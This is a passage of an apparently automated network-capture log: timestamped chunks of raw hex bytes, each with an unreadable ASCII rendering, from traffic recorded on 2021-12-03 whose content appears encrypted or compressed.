6a 8d 3f 85 cf e7 80 7e f9 ee 48
                                              Data Ascii: #s0E6fly((+-xLO*M,OV,bpJokqGfUC4f;"AXaPWsC*</|S0|Y}lk`SB&%bO/rf4=D($+#5J]09!,KVpy'gT%aj?~H
                                              2021-12-03 07:24:05 UTC132INData Raw: e6 f5 89 b6 c5 e4 3e dd 75 4f f1 0c dd c9 f7 97 4a c9 90 f3 5a 90 6f 54 f9 61 f6 b0 d3 42 ab fe df 6b 6d 60 3f 89 58 49 75 1a 1b f1 2c fe f6 6d dd bc cb 81 e7 b7 45 47 7b ed 26 1a 15 82 f0 95 85 d1 e5 e1 c4 e5 73 f9 fb ba 63 78 4a fd 1a c9 60 5e 16 1c 0a 54 c2 1e a0 ab 72 90 db 73 c7 79 1d bd 33 45 f4 1c fe f3 e1 83 7b be 14 e0 4d a3 62 03 88 00 d2 e5 d6 10 cf c6 ee 26 4f bf 1f 61 2d ef 42 55 b0 11 7c 42 ba fe 68 dc df b0 ed c4 73 4e 21 05 73 50 8f 2f 15 c7 8e 93 38 d6 50 65 12 b8 bf 0f 6c 8b d0 b4 38 f5 a5 c2 bc 9f 91 29 c7 8c 2a d0 af 04 1f 7e 8d f0 11 43 40 b9 58 74 75 58 4c 93 4d 46 f3 da 7a 82 6c 99 cc 00 e0 1c 87 d2 bd 85 80 b4 7b 02 f3 b2 c5 a6 6d 88 80 a4 d6 6f 26 49 fc a3 26 46 6b c0 c7 d0 0f 34 18 b0 d3 29 66 17 69 6a e5 b4 3e fb 50 be 77 31 02
                                              Data Ascii: >uOJZoTaBkm`?XIu,mEG{&scxJ`^Trsy3E{Mb&Oa-BU|BhsN!sP/8Pel8)*~C@XtuXLMFzl{mo&I&Fk4)fij>Pw1
                                              2021-12-03 07:24:05 UTC133INData Raw: b6 bb 80 8a 9a 31 cd 77 a7 6b e9 4f e9 ee 11 3b b5 ee 12 dd 42 52 ad ff 06 7a 8c 76 98 b2 b7 56 aa 13 f4 6a cc 39 42 7a 9e c4 47 16 07 77 0e 7f e6 ff 54 cf f1 c9 e7 bc 45 9f 06 6f cb 87 3d 9c 41 81 c8 e1 8a 90 08 ab e4 a5 f9 6a cb ee a6 ba 79 2e 80 ce c4 cf 6c 84 51 51 59 8f c3 2f f3 ac 67 96 97 3c 97 db bf 56 e4 ce ae 8b 7b 7e 8b 30 5a 53 d7 03 19 12 e0 e7 61 9c 0e 6d b2 7c 08 f6 35 03 24 4b 2a d1 9f c3 5d 32 ff b0 76 14 03 5f 64 c0 12 0d 51 43 45 5a bf 04 29 f0 84 a5 e9 0d 9c 9f 83 8d 07 da 8a ce 4a de fa 1a 14 f7 2e 29 bf 9d 4b ae bc ca d2 cf 71 63 0b b7 8c 86 d3 4d 48 fc 91 b1 bc c4 4a 66 0d 6a ad e6 af e2 f5 b9 55 6e c3 4a ca 11 31 d6 c5 b1 61 5b 8e fa 67 29 74 cd c7 85 f0 6a 5e d4 90 89 6e 33 b5 49 28 cb 06 a4 63 10 4c fb 8d b5 78 81 90 ed f5 98 6e
                                              Data Ascii: 1wkO;BRzvVj9BzGwTEo=Ajy.lQQY/g<V{~0ZSam|5$K*]2v_dQCEZ)J.)KqcMHJfjUnJ1a[g)tj^n3I(cLxn
                                              2021-12-03 07:24:05 UTC134INData Raw: ee 94 f3 f6 7d fb 9a cd 06 99 2e 64 91 6f cd c6 05 35 aa 47 b2 a8 c5 e9 43 5a 7c 72 f9 df ba 43 79 4a e2 a2 c4 60 4d 30 3a 0d d3 bc 87 81 5d 66 b0 3a 6d ef 54 85 98 18 7d 54 42 86 f2 e1 87 7b d2 18 e0 4d 26 65 06 b7 24 f2 cd fd 92 b1 7f 11 36 4b 9f e2 76 05 c2 da 70 9b 2a dc 1c c1 ff 68 d8 df fb e1 c4 73 c9 2c 05 63 76 a9 2a 92 b9 17 b2 2d c3 70 86 0d ae 97 b8 4b a6 c4 b8 9e 68 3c c3 bc bb da 14 c6 8c 35 69 a2 04 0f 58 ab ea 96 3d d9 98 73 61 55 bc 53 9f 65 f1 d4 f7 6e 8e ca 03 55 01 e0 38 29 ee bc 85 9f 25 76 02 e3 94 e3 bd ea f6 19 85 e1 7a 06 ac e3 aa 0e f1 4c ed d3 dc ad af 81 b1 d3 0d df 28 68 6a fa 24 33 fb 43 98 51 29 81 de f7 27 66 7d 14 e2 0b f1 5e ef af b5 8b 18 31 f0 09 c4 0c b4 e1 e8 0c 48 17 08 9f 15 d0 71 5c e6 56 dd d0 8a 91 20 37 f1 26 2f
                                              Data Ascii: }.do5GCZ|rCyJ`M0:]f:mT}TB{M&e$6Kvp*hs,cv*-pKh<5iX=saUSenU8)%vzL(hj$3CQ)'f}^1Hq\V 7&/
                                              2021-12-03 07:24:05 UTC136INData Raw: 16 07 77 0e 7b e6 ff 54 cf f1 c9 b3 bc 45 9f 06 6f cb 84 3d 9c 15 81 c8 e1 8a 9a 13 ab e4 a6 c1 6f e4 ec a0 96 d5 d6 67 56 c5 cb 48 ac 04 50 59 15 7c 27 cc 98 61 be c2 3d 97 fb 95 47 f0 ce b1 8c 43 7b a4 32 5c 7f 7b fb fe 8a e1 e3 45 b5 5a 6c b2 e6 b7 fe 0a 37 22 62 7e d0 9f e3 5f 13 eb b0 69 10 20 5a 4b c2 14 21 f9 bb a2 c2 be 00 0d da d3 a4 e9 97 23 97 bf b9 01 f0 dd cf 4a fe e7 2c 00 f7 32 1e 87 b7 66 aa 96 4a 86 d4 0e fa 0e 97 83 a7 84 4c d2 d9 26 86 b7 f5 67 47 5a 6b 8d a5 80 ac e1 a6 5e 5b c6 65 c8 17 1d 7a 39 56 f9 5a 8a de 4b 70 75 cd 5d 3a f8 55 69 d2 bc d0 6f 33 95 27 72 df 06 bb 74 10 4c fb 8d b5 78 85 90 ed f5 98 6e db ed 87 da bc f8 7a 10 02 b4 4e 63 bc e1 36 c9 f9 8c e1 9c ab ea 9a ef db 00 d5 a8 ed 4f 93 1b 31 7e 30 53 d9 1b 58 1c 3c fc 21
                                              Data Ascii: w{TEo=ogVHPY|'a=GC{2\{EZl7"b~_i ZK!#J,2fJL&gGZk^[ez9VZKpu]:Uio3'rtLxnzNc6O1~0SX<!
                                              2021-12-03 07:24:05 UTC137INData Raw: 9c c9 b7 ab 76 ac 12 5e c5 79 81 b2 98 29 4b 3d 1f f7 c1 f9 5a fc 19 7a 68 91 52 0d 85 78 d3 e3 fc b2 e5 49 ef 26 54 8e d5 4c 2f ef de 5a 1b 7e c3 63 58 fa 48 a7 fe d4 e0 5e 56 7e 1b 0e 51 2b 88 05 93 99 72 84 38 d2 6f 98 3a 95 bd 95 4f 8c 44 ec 81 17 a5 c6 9c c3 fb 24 c7 16 10 de 95 0f 3d 02 8a da 97 1d 5a ae 58 70 4a b2 64 be 4f dc d0 dd ea da d5 7c cc 04 c0 41 08 df bd 1f ba 92 42 09 d1 cf c2 8c eb d6 88 b3 d6 6b 18 84 d1 a1 26 da 64 6b ab 6f 2e d1 1c 90 ad 08 ff 1a f3 4f d7 ac 30 f6 2c bf 71 1b a0 47 e1 07 26 73 1a ca 3b db 73 eb 85 35 df 07 4e 69 0c e4 77 95 d2 e9 96 6d a0 3f 94 27 89 50 6f e7 76 7a e6 cd 80 3f 2b c6 01 05 52 5b 2f f8 b1 5a 5a 03 0d c1 85 1d a9 74 ff cd 4e ef a1 38 2a 01 55 a5 98 0b 59 d3 c0 cd 47 a4 0d da cb 5a 0d 5b a1 c9 9c 0e 8e
                                              Data Ascii: v^y)K=ZzhRxI&TL/Z~cXH^V~Q+r8o:OD$=ZXpJdO|ABk&dko.O0,qG&s;s5Niwm?'Povz?+R[/ZZtN8*UYGZ[
                                              2021-12-03 07:24:05 UTC138INData Raw: 69 a1 41 77 79 b5 e7 02 e1 aa 08 86 96 3c 89 d3 98 5b e4 c8 9b 15 2d ca 88 30 58 59 f0 7c 80 13 7a c6 6c 87 29 4d 13 e7 2d db 07 72 1c 42 2b ce 8e cb 52 3f ff b6 43 8d 55 eb 67 c0 10 07 71 3c dc 5b 25 25 24 eb a3 85 4b 96 b9 b2 b2 c3 3f d0 8b d2 62 d3 c5 15 12 dd b4 7f 0b 9e 4b ac b6 ef ad 56 70 f9 2a ba 95 a1 f3 ee d3 d9 bc 83 f4 fc 41 67 12 67 a5 88 a2 e2 f3 8c d8 38 77 49 ca 13 3b f4 ba 28 60 c1 af f7 79 0e 54 69 5c a0 dd 58 03 ec 9c 88 71 3d bd 2a 25 cb 00 91 e8 46 f8 f8 8d b7 72 a2 ef 74 f4 02 4f d6 a6 a0 fa 19 63 5f 3d 33 1b 76 3a bd fe 3b c1 8d 9a e1 9a 9a 40 c9 74 da 06 fb 0e 35 d7 92 1b af 7b 47 43 ff 3b 64 38 11 ee 27 c1 d5 86 0c 3a ae 5c 5b 11 ec f5 5d 7b 0c 16 fc 4e 2e 90 38 62 7f 55 2a cf e6 bf 56 00 a5 59 5d b2 8a 20 dc 80 67 40 fb 9c 25 76
                                              Data Ascii: iAwy<[-0XY|zl)M-rB+R?CUgq<[%%$K?bKVp*Agg8wI;(`yTi\Xq=*%FrtOc_=3v:;@t5{GC;d8':\[]{N.8bU*VY] g@%v
                                              2021-12-03 07:24:05 UTC139INData Raw: c2 c9 56 bd c7 5b 62 58 de 7c c6 ff d4 fc ec 5e 51 09 2e 5b d2 f7 9c 92 b9 13 b2 f0 d3 70 86 88 9d 92 84 6f 86 0a 93 18 16 85 d8 a6 bf fa 3a ef a1 37 f3 81 03 9b 00 12 db 97 39 f9 71 59 70 55 26 69 be 5f fa f6 3e 69 a4 4c 5d ee 1a e0 3c 16 d6 95 a8 9d bf 55 05 77 cc 5a 8d eb f2 39 6f d7 6b 06 36 d9 8e 34 fa 6e 27 d4 f6 2f f1 33 aa d3 09 e0 0e 41 47 f8 be 10 fc d0 c0 e8 1a 80 da d7 cc 27 6c 14 78 33 f4 62 cb 8f 78 a0 9e 4f 49 37 de 08 94 cb c1 21 4a 8d 2b 98 85 88 c8 6e e7 52 fd 3c cc 80 20 ad cb 01 16 74 7d c9 7f cf c3 7b 41 13 e1 05 07 81 59 67 e8 65 d7 05 66 33 01 55 a1 98 05 4e d3 c0 48 7a a1 31 fe eb 91 26 dd df 70 da 14 8a 99 8d 34 56 cd c7 e3 55 a8 7f 3b 6a 1a 00 84 71 3f 10 90 50 51 a4 62 e5 0e 1d 33 78 8e 76 cf 14 22 41 fe 3c c5 a9 22 2c 49 4b 10
                                              Data Ascii: V[bX|^Q.[po:79qYpU&i_>iL]<UwZ9ok64n'/3AG'lx3bxOI7!J+nR< t}{AYgef3UNHz1&p4VU;jq?PQb3xv"A<",IK
                                              2021-12-03 07:24:05 UTC141INData Raw: 25 04 d8 0e fc 8d c5 5f d3 fe b0 69 2f 0a 6e 66 c0 0b 2d fb 10 de 5b b9 2a 8f 84 1c a4 e9 93 99 5d 93 ab 27 4a ae e3 58 d8 e7 fa 15 f7 32 21 b9 83 4b a8 89 47 84 7b 72 63 09 bd 05 f9 4a 4c d2 dd 9c 53 9b e4 41 fd 28 47 9c 83 80 12 f4 a6 5e 66 d8 54 ca 17 07 78 96 2a 60 5d a0 58 15 b1 75 cd 59 80 2c 79 78 f4 06 ad 43 22 b3 27 d6 ca 06 bb 4e 04 7d f9 8d ae 7a 2a ec 74 f2 b2 e8 85 2d 87 da b8 42 ad 3c 13 92 f4 1f 90 f0 10 c9 52 99 e1 9c 90 81 ab ed db 18 d7 03 91 d6 94 31 b7 20 f3 53 d9 1f e2 ca 10 ee 07 cd e8 ab 1d 06 a6 82 58 11 ea ff 94 19 95 17 e1 62 23 35 39 64 55 49 71 7b f6 99 72 87 50 58 5d 92 8a 1d f1 92 58 48 22 9f 25 70 2f ec 00 07 ff 43 ff 94 e1 84 fc 8d 55 c8 bc c6 39 16 c8 6c 13 16 c0 2d 30 7e 1e 7d ea 9c 91 47 25 7d 59 69 eb 9e 10 3f 75 f2 85
                                              Data Ascii: %_i/nf-[*]'JX2!KG{rcJLSA(G^fTx*`]XuY,yxC"'N}z*t-B<R1 SXb#59dUIq{rPX]XH"%p/CU9l-0~}G%}Yi?u
                                              2021-12-03 07:24:05 UTC142INData Raw: 9c aa f8 24 c7 16 10 de 96 0f 3d 6b 89 da 97 1d 2e a5 58 70 4e 94 61 91 4d da fc 71 16 3d 4d 7d c8 20 f6 3e 09 df 27 a0 b2 ad 75 0f e7 b0 c3 8c cb 0a 04 a5 d6 74 46 84 d1 a1 26 da 64 6b ab 6f 2e d1 1c 90 c4 0b ff 1a f3 4f d7 ac 30 f6 45 bc 71 1b a0 e2 e9 07 26 73 1d ca 3b db 73 eb 85 35 df 07 4e 69 0c e4 10 96 d2 e9 96 6d a0 3f 94 27 ee 53 6f e7 76 98 ee cd 80 3f 3b c6 01 05 52 5b 2f fc b1 5a 5a 03 0d c1 1c 1e a9 74 ff cd 4e ec a1 38 b3 02 55 a5 98 99 51 d3 c0 cb 77 a1 22 d8 cd 76 a5 a3 46 51 9d 0a aa 83 94 1c 7b 55 e2 c8 6e 0c 21 b8 69 1a 04 84 eb 20 10 90 d3 5c a4 71 c3 28 f9 b0 06 17 57 83 0a 02 5a e7 14 e8 31 07 07 72 ef 4e e0 70 62 58 02 70 25 48 5e 95 5d 47 64 a0 79 b1 94 b9 67 ea c4 b2 90 f2 a3 0d 1d 54 c5 19 fb 12 b7 05 07 df 86 90 8d 0e a8 55 fa
                                              Data Ascii: $=k.XpNaMq=M} >'utF&dko.O0Eq&s;s5Nim?'Sov?;R[/ZZtN8UQw"vFQ{Un!i \q(WZ1rNpbXp%H^]GdygTU
                                              2021-12-03 07:24:05 UTC143INData Raw: 14 f1 18 87 ec 06 4a a8 92 6c 90 54 70 63 95 b2 aa 95 f5 6d ee db bc a3 ba 26 60 67 0d 75 81 8d 8d e0 f5 a0 74 c4 90 d1 cb 17 1f 70 86 2a 60 5b 10 ff 46 39 52 ed 60 a2 dd 78 58 3a bd 88 6e 29 bd 2a 25 cb 00 91 ec 46 f8 f8 8d b7 72 39 ec 74 f4 02 4f d6 a5 a0 fa 82 60 5f 3d 33 40 4f 3a bd fc 1e c4 a2 98 e7 b6 32 bc 2e ec db 02 df 11 91 d6 92 81 10 73 7b 74 f9 24 c0 39 11 ce de 76 cd 86 12 08 ab 73 59 17 c0 5d a1 9c 94 17 f8 6a 4e 35 39 62 e5 ea 22 f3 d1 b9 36 a5 a4 59 7d 73 31 38 dc 9e 56 45 d4 9e 23 5a 89 c0 85 06 ff 58 fe fd ce 86 fc 11 5a 67 d0 79 18 57 ce 4c e6 37 29 0c aa 5b 2c 62 e4 91 66 46 23 57 ff 64 6e 9f 10 21 7d 9d 85 11 88 98 39 3f e9 b9 22 e5 c7 60 cf 42 38 8f 70 80 5f bf fd 0d c2 38 f3 a3 34 9b a0 33 dd 71 70 93 26 f0 cb 6d b4 4d 5e c8 4a 18
                                              Data Ascii: JlTpcm&`gutp*`[F9R`xX:n)*%Fr9tO`_=3@O:2.s{t$9vsY]jN59b"6Y}s18VE#ZXZgyWL7)[,bfF#Wdn!}9?"`B8p_843qp&mM^J
                                              2021-12-03 07:24:05 UTC144INData Raw: 23 d9 9f c1 8c ed dc 9f db 4f 6a 06 a8 dc c0 24 dc 4e 77 f0 db 3d f7 38 d3 d1 09 ff 3a 65 4e fa be 09 c0 7a 93 73 1b 86 f4 75 79 bf 6d 14 e6 36 bd 71 ed af 29 84 b3 5e 4f 28 a0 0a 94 d2 c9 2e 6c 8d 2d a5 2f db 53 6f e1 7c 5f 8e 54 81 20 33 ce 49 05 52 5d 9f 5b e2 d2 7d 23 6c e3 05 1c 89 57 41 e8 63 ea af 35 a8 00 53 8f 3e b6 d6 d2 c0 d6 7f ea 22 d8 cb c6 02 f0 cd 76 bd 68 88 99 96 3c 5f eb c7 e5 60 20 29 8f 69 1a 02 8e 3d 40 89 91 ca 70 a9 14 c1 2e d3 a8 5d a3 47 a5 2e 45 43 e5 14 c8 85 06 2a 63 d3 46 d6 70 62 5e 08 a1 45 d1 5f 89 71 4a 0e a2 7f 9b 88 e2 d3 f9 e2 96 d8 ec a1 0d 3d fc c4 34 e9 2b 81 31 28 dd 86 b6 fa 96 d6 cc e4 c4 1d 93 52 98 66 6c f9 aa 9d 9c 0e 0e 68 4e f7 2e 3f d1 0d 58 23 a9 b2 88 5f 96 31 cb 40 09 38 72 4e ef c0 b3 2f 2e ef 12 43 47
                                              Data Ascii: #Oj$Nw=8:eNzsuym6q)^O(.l-/So|_T 3IR][}#lWAc5S>"vh<_` )i=@p.]G.EC*cFpb^E_qJ=4+1(RflhN.?X#_1@8rN/.CG
                                              2021-12-03 07:24:05 UTC146INData Raw: 70 32 2a 60 5b aa 87 4d 28 74 d2 54 88 f0 7a 78 f2 b6 0a 10 aa 94 07 23 eb 8c b9 6e 38 fb dc a0 a2 74 27 64 76 f4 98 4a 9d 92 86 da a0 4a 72 3f 13 94 44 b8 c3 78 37 e9 a4 b8 6a 9e b0 c2 2d c8 f6 17 d9 0e 18 d4 92 1b 15 32 4c 52 d9 06 ea 14 13 ee 01 7d 4b f8 95 21 86 75 79 9d e8 df df 9f b0 3a ee 6c 2e bb 3b 62 7f ef 7c c4 f7 99 69 a9 8c 74 5f 92 16 12 5a fe e7 69 d6 9a 05 fd 0d be 1c 9d da 71 cc 9a ec 0b fe 8b 7f 6a 43 79 38 16 d3 5a ce 3a c2 2d ac 71 b5 12 55 bd 64 42 05 f3 7b 1a f7 04 35 08 4f f9
                                              Data Ascii: p2*`[M(tTzx#n8t'dvJJr?Dx7j-2LR}K!uy:l.;b|it_ZiqjCy8Z:-qUdB{5O
                                              2021-12-03 07:24:05 UTC146INData Raw: a7 9f 8a 02 1c 32 6c b9 02 a7 da 75 e7 4f cd ae 76 aa c2 cd 4c 21 c0 3c d5 06 b4 e5 39 a8 f8 58 41 f6 04 7f c9 f7 91 40 e3 c8 6a 5b 87 43 59 24 61 f0 9a cb 19 1f ed f9 4f 92 f0 3d 89 78 2d 5c 37 0a c8 2e 46 d9 6f dd 9a 4c 21 99 2e 5c 6f 52 cf c6 1c 3f 00 14 29 a9 c3 c7 e1 b5 e7 73 f9 41 bf 43 69 6c c2 a9 e3 4d 5c 36 b5 06 d2 bc 90 89 86 74 b0 3c 59 45 07 1e 99 1e 53 f2 ae 1d f3 e1 19 7e d1 08 c6 6d 2e 42 2b a5 22 62 c5 fc 92 a9 77 c2 24 4b 99 d7 e3 53 76 d9 70 99 20 c9 60 58 fe f2 f9 d2 c5 c6 e4 e0 51 09 28 51 e2 af 05 93 ae 3f bf 3a d2 76 ac 90 c6 26 94 49 a2 e2 06 1a 16 a5 58 99 92 eb 02 e7 18 37 f3 87 09 ae 58 8b da 8f 15 f4 ba 58 76 7f 3e 32 0a 4c dc d2 d7 fd a6 4c 7d 56 25 cd 2d 2f ff 28 87 9f bf 73 9a d7 b2 c3 9b c3 db 1b a5 d0 41 84 d2 65 a2 26 d8
                                              Data Ascii: 2luOvL!<9XA@j[CY$aO=x-\7.FoL!.\oR?)sACilM\6t<YES~m.B+"bw$KSvp `XQ(Q?:v&IX7XXv>2LL}V%-/(sAe&
                                              2021-12-03 07:24:05 UTC147INData Raw: 3c e3 19 b3 22 b2 4b 6e 63 89 9a 0c 56 b7 00 4c f3 0e a9 9b 29 58 b9 93 96 b1 54 b4 87 cf 6a 8f 66 37 68 ef c4 8a 6d 01 ed 12 df 48 d2 d2 66 07 e0 ad 7b 3e 96 97 50 31 36 d9 58 15 17 f5 78 85 ec 4a cb 20 71 24 e2 91 4e 78 cd f5 ef ca 3f 3b 06 9d 4a e2 b6 a3 be 46 80 52 c4 87 85 21 8b 5c bb d1 47 e9 06 87 90 ff 4e 31 e2 c6 cb 4a a6 d6 2f c0 14 e6 06 c1 33 45 9e 96 a6 b2 d6 a7 7f c4 77 b3 93 53 73 79 17 5c 79 4e 71 a8 3e e2 e3 47 bf 89 13 2b e7 2d df 07 9f 06 42 2b 4b ba ce 6d 1b df 0a 6b 0f 2b 52 9a e7 14 27 cc 34 f4 76 bd 00 0f d0 03 db 70 96 b9 b6 b2 10 25 d0 8b 54 6f d3 d5 33 34 4c 30 01 92 bf 4e 80 96 4c b3 59 58 4e 0d 97 81 ad 55 33 4b d8 bc a7 ba 58 43 67 0d f0 a8 88 b2 c4 d5 1a 5c 46 ee 68 de 3f 1b 50 a4 3e 48 76 88 da 6d 02 f2 b3 c4 a1 dd 7c 58 49
                                              Data Ascii: <"KncVL)XTjf7hmHf{>P16XxJ q$Nx?;JFR!\GN1J/3EwSsy\yNq>G+-B+Kmk+R'4vp%To34L0NLYXNU3KXCg\Fh?P>Hvm|XI
                                              2021-12-03 07:24:05 UTC148INData Raw: 76 82 4d 54 fa 63 f6 b0 69 7b ad ec f9 54 96 48 12 8b 78 b1 53 9c 65 77 0f d6 df 4f 00 b8 e1 07 03 0b 69 55 59 ed 1b 18 15 82 4a f0 83 c3 c3 de 2d cd 5e fb db 9c 44 fe 34 7b 39 e1 49 7c c8 18 20 d2 26 a2 8c b9 50 90 e4 71 c7 79 a7 d1 35 57 d2 23 14 db cc 81 5b fa 33 66 33 25 41 2b a1 22 0d e1 fc 92 2b 7a c2 34 6d bf 22 63 2d ef f8 24 b6 00 5a 7d 57 d6 45 de ff d2 ca 42 0d ca 08 28 75 70 69 07 93 b9 8d b7 15 c0 56 a6 f2 ba bf 95 69 c5 e9 92 18 09 a9 ea 91 bd fa 22 ed 0a 4b 6a 86 29 19 5e 6a d8 97 3d 43 9d 75 62 73 9c ad 91 4d dc f6 98 43 a4 4c 62 e8 28 cd 3e 09 d9 97 07 e1 26 52 2f f5 92 21 8e eb f6 83 80 fb 7a 20 8c 1e a1 26 dc 6e 7e fe f6 2f c9 30 9d d1 09 f9 30 eb 14 63 bf 16 d2 72 5d 73 1b 80 44 d2 2a 37 4a 34 01 14 d9 73 cd 3a 98 a1 9e 51 41 25 c6 08
                                              Data Ascii: vMTci{THxSewOiUYJ-^D4{9I| &Pqy5W#[3f3%A+"+z4m"c-$Z}WEB(upiVi"Kj)^j=CubsMCLb(>&R/!z &n~/00cr]sD*7J4s:QA%
                                              2021-12-03 07:24:05 UTC150INData Raw: 61 57 ac ff 9c c5 84 49 af b4 94 53 ab 13 d4 56 1e 37 42 65 94 c4 47 16 07 77 0e 7b e6 ff 54 cf f1 c9 e4 be 45 9f 06 6f cb 84 3d 9c 42 83 c8 e1 8a b9 2a ab e4 a6 c0 6f e4 ec a0 96 d5 d6 67 56 c5 cb 48 ac 55 52 59 15 7c 27 cc 98 61 be 93 3f 97 fb 95 67 c9 ce b1 8c 5c 7b a4 32 5c 7f 7b fb fe 8a e1 e3 45 b5 09 6e b2 e6 b7 fe 0a 37 22 62 2d d2 9f e3 5f 70 d2 b0 69 10 24 5a 4b c2 14 21 f9 bf a2 c2 be 00 0d da 82 a6 e9 97 23 97 bf ba 01 f0 8c cd 4a fe e7 49 39 f7 32 1f ba b2 49 a8 90 66 2e 28 e9 62 0f 93 a7 8f d0 4d d2 43 99 8e 8b c2 61 6f 0e 6a 8d 85 c4 cf f5 a6 42 6e c3 4a ca 11 31 d6 c5 b1 61 5b 8e fa 62 2b 74 cd c7 85 f0 6a 5e d4 95 8b 6e 33 b5 6d 0a cb 06 a4 5c 10 4c fb 8d b5 78 81 90 ed f5 98 6e db be 85 da bc f8 7a 10 01 b4 4e 30 be e1 36 c9 3c b5 e1 9c
                                              Data Ascii: aWISV7BeGw{TEo=B*ogVHURY|'a?g\{2\{En7"b-_pi$ZK!#JI92If.(bMCaojBnJ1a[b+tj^n3m\LxnzN06<
                                              2021-12-03 07:24:05 UTC151INData Raw: 2c 30 56 55 41 b8 40 d6 1e 68 3d d1 e7 c4 73 b8 7e a2 f0 a1 bb 82 5b 04 2d 1d 10 c7 1f 8f ce 60 c0 3b 2f ae e6 28 7c 44 be af 82 18 bf 53 ec 1a f1 11 46 ce 6d bb 86 e9 c2 fc 0c bc 26 1e d9 a3 3d 22 e5 c0 2c dc 67 3d 54 1d 9f 00 a4 97 ae 97 eb 1a 21 63 40 2f 17 c6 74 e7 c2 32 ae 68 8d 4c f2 67 81 d1 f8 25 b5 89 b2 39 42 a7 c3 eb ae ea 11 d5 8f 20 b7 ac 32 0b 63 c8 84 ab 2e c9 ba 5e 74 41 b8 1b a9 59 fb f8 85 01 a5 50 77 f4 2e cf 32 29 f4 9f fb fa a6 58 22 92 cc ce 91 fb 9e 6a bc d7 1d 10 9c cd 7b e8 07 94 79 5a 14 e7 04 9b 30 20 ca 3b d1 ba b5 33 63 cb 49 b8 71 a9 db 13 20 27 dc f4 e2 81 27 ce 17 8f 0f 4c 71 4d 71 a9 9c e7 2b e1 63 23 12 fb bc 47 dc 4b ef 1c a2 8e 12 9b 06 0e 3a 67 a5 af 69 a3 9d e1 e6 81 f2 48 4c cd 96 ce 4b b4 ba 11 f9 ee 64 f9 6f 0e bc
                                              Data Ascii: ,0VUA@h=s~[-`;/(|DSFm&=",g=T!c@/t2hLg%9B 2c.^tAYPw.2)X"j{yZ0 ;3cIq ''LqMq+c#GK:giHLKdo
                                              2021-12-03 07:24:05 UTC152INData Raw: 10 fa 2d 47 52 05 32 81 08 50 1d 56 c4 5f ab f9 dd 90 2a 66 94 8c 8b 1f cd 1f 12 12 1d e1 4b b7 c6 0e c6 dd 70 ff 9b ca 53 f5 d8 a6 87 46 79 d7 4b 30 05 30 10 e0 74 d9 c3 10 f2 7b 1a c0 93 44 a7 04 1b 5a 2e 46 af e5 90 0f 5f 81 cb 12 5f 60 4f 5d e2 41 1e cd 3a cd 55 bf 0b 0b a4 b0 be e1 9c b7 a3 9f b3 60 e3 88 ce 57 e1 d3 00 15 d4 16 27 e1 81 53 bb db 67 81 70 5e 65 25 b2 ae b6 e9 67 ea f3 90 90 e9 d9 60 50 72 48 a8 bc 81 27 6f 37 c7 db 2c 85 0e d9 96 9d 7b e2 ac 9e 5d 01 a4 e3 a2 5d 8d 6e 07 e4 bf 36 5a 57 b5 eb 49 ec c1 30 e2 5c 95 dc d4 4a 3d 06 93 e6 04 91 18 6e df 00 42 75 2c 4d 9e aa cb ac 69 88 ca 13 2e b3 6c 2d 5f 46 17 39 41 21 67 5d 8e 7c bb 2b 47 05 90 8a 89 e0 c0 55 c3 45 b8 8d 74 94 d9 1c 5e a0 cb 12 fc f6 aa 47 4e 49 a9 27 8a 4e e2 b8 80 80
                                              Data Ascii: -GR2PV_*fKpSFyK00t{DZ.F__`O]A:U`W'Sgp^e%g`PrH'o7,{]]n6ZWI0\J=nBu,Mi.l-_F9A!g]|+GUEt^GNI'N
                                              2021-12-03 07:24:05 UTC154INData Raw: 19 bc 09 f1 4b a7 01 56 ab 46 d0 f3 a6 c0 ed 18 e1 2b 1b c7 a7 20 07 87 bf 15 fc 7d 6b 4d 79 cd 58 bf 98 e5 d2 e3 57 33 57 06 12 73 ba 7e ee c4 73 bd 12 a3 0b fd 0c f3 b4 93 4b a6 dc c2 58 56 f5 93 b8 b9 a8 77 9f c9 36 cc c1 2b 5d 2c 9f c6 89 38 91 f3 4a 6a 71 83 24 b9 6c ff f5 c8 17 c5 2f 0c ba 25 c5 4f 65 a6 db a7 87 d9 72 4e 8c 87 fc b3 c9 9f 71 96 13 ae da 25 31 63 e6 1e 9e 73 57 74 b9 46 de 74 5f 84 65 9d ac 93 77 33 d9 59 cd 69 a8 c2 40 55 41 ea c1 8b ee 4d f9 3b 9d 01 5d 0f 05 3a fb dc f0 3e a6 3b 6e 48 eb 93 2e 8f 5f aa 4f a0 94 1c c8 08 24 42 01 a1 af 23 ad 8b de d3 91 a4 09 05 91 c8 93 79 cd d5 77 b7 ec 5d a2 3e 0c d3 71 93 f0 00 04 3f e2 73 62 6b ef 20 8c 25 6b f4 8d 6c 25 e8 2a bb 3b 34 77 e3 8a 2c 27 56 c8 cb e3 55 7f 4a 6f d9 c3 5d 41 81 c7
                                              Data Ascii: KVF+ }kMyXW3Ws~sKXVw6+],8Jjq$l/%OerNq%1csWtFt_ew3Yi@UAM;]:>;nH._O$B#yw]>q?sbk %kl%*;4w,'VUJo]A
                                              2021-12-03 07:24:05 UTC155INData Raw: e5 de 38 3a e4 48 32 0e 0d 30 e9 73 8d 88 7b ca 76 00 cd a5 7d a9 52 5f 7a 73 79 a7 ff 97 49 11 f8 b6 60 0c 22 43 47 cb 06 29 d8 3f e4 6b b6 1e 03 a3 bf bb e1 8b 97 ad 8d bd 38 c9 8c f6 61 df e0 2e 17 d1 10 23 a2 ee 4d d8 91 3d dd 23 1e 15 67 f8 ed e9 a2 24 b4 c9 aa df f4 f1 57 07 8a f2 13 3d 3c 09 61 3d c9 a3 7c ac 59 e7 d6 9b 65 fc af 91 14 36 b2 f6 b3 0c 88 31 25 a0 b8 24 25 40 a5 fe 2e bc 92 7f a9 00 d9 f8 df 53 3d 74 f9 ac 5b ac 58 36 c3 4b 10 25 72 15 cc f0 ed c2 4b c7 e7 61 58 b0 6b 29 15 75 0f 71 73 35 6b 1e ac 65 a5 19 5f 02 95 ac 8c da d0 4d 89 50 a3 90 4d ad f3 35 7d f7 a9 79 80 de e1 06 5a 2e f5 64 e0 13 d7 e1 af cb 86 e1 58 ea 1f 13 7f 97 4a 43 44 44 fc 00 2f ca ea 04 23 9b da 6b 21 5b ba 7a 4f a1 00 82 ec 87 d3 a0 d5 6c 2a 9a 0a 64 47 8b 66
                                              Data Ascii: 8:H20s{v}R_zsyI`"CG)?k8a.#M=#g$W=<a=|Ye61%$%@.S=t[X6K%rKaXk)uqs5ke_MPM5}yZ.dXJCDD/#k![zOl*dGf
